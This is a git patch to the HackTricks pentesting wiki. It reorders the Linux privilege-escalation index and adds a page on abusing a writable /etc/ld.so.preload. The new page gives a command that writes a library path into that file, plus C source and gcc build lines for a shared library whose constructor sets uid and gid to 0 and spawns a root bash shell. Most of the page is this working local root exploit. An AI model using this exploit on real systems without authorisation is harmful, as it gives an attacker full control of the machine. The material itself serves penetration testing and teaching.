From c6405d9dccff1e763e148cf5a1d40aff155e697b Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Thu, 22 Sep 2022 23:27:50 +0000
Subject: [PATCH] GitBook: [#3500] No subject

---
 SUMMARY.md                                    | 15 +++---
 .../privilege-escalation/write-to-root.md     | 47 +++++++++++++++++++
 2 files changed, 55 insertions(+), 7 deletions(-)
 create mode 100644 linux-hardening/privilege-escalation/write-to-root.md

diff --git a/SUMMARY.md b/SUMMARY.md
index 1bf9c9faa..875c43230 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -79,8 +79,7 @@
 
 * [Checklist - Linux Privilege Escalation](linux-hardening/linux-privilege-escalation-checklist.md)
 * [Linux Privilege Escalation](linux-hardening/privilege-escalation/README.md)
-  * [SELinux](linux-hardening/privilege-escalation/selinux.md)
-  * [Logstash](linux-hardening/privilege-escalation/logstash.md)
+  * [Cisco - vmanage](linux-hardening/privilege-escalation/cisco-vmanage.md)
   * [Containerd (ctr) Privilege Escalation](linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md)
   * [Docker Basics & Breakout](linux-hardening/privilege-escalation/docker-breakout/README.md)
     * [AuthZ& AuthN - Docker Access Authorization Plugin](linux-hardening/privilege-escalation/docker-breakout/authz-and-authn-docker-access-authorization-plugin.md)
@@ -93,23 +92,25 @@
     * [Namespaces](linux-hardening/privilege-escalation/docker-breakout/namespaces.md)
     * [Docker --privileged](linux-hardening/privilege-escalation/docker-breakout/docker-privileged.md)
     * [Abusing Docker Socket for Privilege Escalation](linux-hardening/privilege-escalation/docker-breakout/abusing-docker-socket-for-privilege-escalation.md)
-  * [Node inspector/CEF debug abuse](linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md)
-  * [euid, ruid, suid](linux-hardening/privilege-escalation/euid-ruid-suid.md)
   * [Escaping from Jails](linux-hardening/privilege-escalation/escaping-from-limited-bash.md)
-  * [Cisco - vmanage](linux-hardening/privilege-escalation/cisco-vmanage.md)
+  * [euid, ruid, suid](linux-hardening/privilege-escalation/euid-ruid-suid.md)
+  * [Logstash](linux-hardening/privilege-escalation/logstash.md)
+  * [Node inspector/CEF debug abuse](linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md)
   * [D-Bus Enumeration & Command Injection Privilege Escalation](linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation.md)
   * [Interesting Groups - Linux PE](linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md)
     * [lxd/lxc Group - Privilege escalation](linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md)
   * [ld.so exploit example](linux-hardening/privilege-escalation/ld.so.conf-example.md)
+  * [Linux Active Directory](linux-hardening/privilege-escalation/linux-active-directory.md)
   * [Linux Capabilities](linux-hardening/privilege-escalation/linux-capabilities.md)
   * [NFS no\_root\_squash/no\_all\_squash misconfiguration PE](linux-hardening/privilege-escalation/nfs-no\_root\_squash-misconfiguration-pe.md)
   * [Payloads to execute](linux-hardening/privilege-escalation/payloads-to-execute.md)
   * [RunC Privilege Escalation](linux-hardening/privilege-escalation/runc-privilege-escalation.md)
+  * [SELinux](linux-hardening/privilege-escalation/selinux.md)
+  * [Socket Command Injection](linux-hardening/privilege-escalation/socket-command-injection.md)
   * [Splunk LPE and Persistence](linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md)
   * [SSH Forward Agent exploitation](linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md)
-  * [Socket Command Injection](linux-hardening/privilege-escalation/socket-command-injection.md)
   * [Wildcards Spare tricks](linux-hardening/privilege-escalation/wildcards-spare-tricks.md)
-  * [Linux Active Directory](linux-hardening/privilege-escalation/linux-active-directory.md)
+  * [Write to Root](linux-hardening/privilege-escalation/write-to-root.md)
 * [Useful Linux Commands](linux-hardening/useful-linux-commands/README.md)
 * [Bypass Linux Shell Restrictions](linux-hardening/useful-linux-commands/bypass-bash-restrictions.md)
   * [DDexec](linux-hardening/bypass-linux-shell-restrictions/ddexec.md)
diff --git a/linux-hardening/privilege-escalation/write-to-root.md b/linux-hardening/privilege-escalation/write-to-root.md
new file mode 100644
index 000000000..4f6bfbcd8
--- /dev/null
+++ b/linux-hardening/privilege-escalation/write-to-root.md
@@ -0,0 +1,47 @@
+# Write to Root
+
+<details>
+
+<summary><strong>Support HackTricks and get benefits!</strong></summary>
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+</details>
+
+### /etc/ld.so.preload
+
+This file behaves like **`LD_PRELOAD`** env variable but it also works in **SUID binaries**.\
+If you can create it or modify it, you can just add a **path to a library that will be loaded** with each executed binary.
+
+For example: `echo "/tmp/pe.so" > /etc/ld.so.preload`
+
+```c
+#include <stdio.h>
+#include <sys/types.h>
+#include <stdlib.h>
+
+void _init() {
+    unlink("/etc/ld.so.preload");
+    setgid(0);
+    setuid(0);
+    system("/bin/bash");
+}
+//cd /tmp
+//gcc -fPIC -shared -o pe.so pe.c -nostartfiles
+```
+
+<details>
+
+<summary><strong>Support HackTricks and get benefits!</strong></summary>
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+</details>